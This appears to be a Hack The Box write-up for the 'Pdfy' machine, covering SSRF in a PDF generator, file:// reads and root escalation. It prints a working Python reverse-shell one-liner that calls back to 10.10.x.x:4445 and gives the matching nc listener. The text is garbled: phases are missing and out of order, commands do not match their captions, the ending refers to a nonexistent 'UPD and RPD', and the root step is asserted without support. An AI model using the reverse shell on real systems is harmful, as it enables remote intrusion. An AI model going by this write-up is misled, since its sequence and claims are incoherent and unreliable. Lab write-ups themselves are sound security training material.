Pdfy HTB Writeup
If you are attempting this box, focus on the URL schemes (file://, gopher://) and the metadata of the files you are asking the server to process. The flag is usually found in /root/root.txt or a similar standard location after escalating privileges via a misconfigured script or binary.
Check sudo rights:
ls -la /home/
The vulnerability map follows a classic vector where an application trusts user input to make outbound HTTP requests:
The box highlights why developers must sanitize URL inputs.
fetch("/api/cache", { method: "POST", body: JSON.stringify({ url: url.value }), headers: { "Content-Type": "application/json" } })
⚙️ Phase 2: Vulnerability Identification (SSRF & Code Execution)
We inject our payload into the vulnerable input field and submit it to the application. When the backend processes our input, it triggers the reverse shell, granting us a shell on the target system as the web application user.
🚩 Phase 4: Post-Exploitation and Flag Capture
By using the PDF generator to read files via file:// and then exploiting pdftex for root, you can successfully root PDFY and capture both the UPD and RPD.
"endpoint": "/download", "methods": ["GET"]
import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.x.x",4445)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);
Set up a new listener: nc -lvnp 4445
Wait for the cron job to execute, giving us a root shell.
6. Conclusion and Key Takeaways



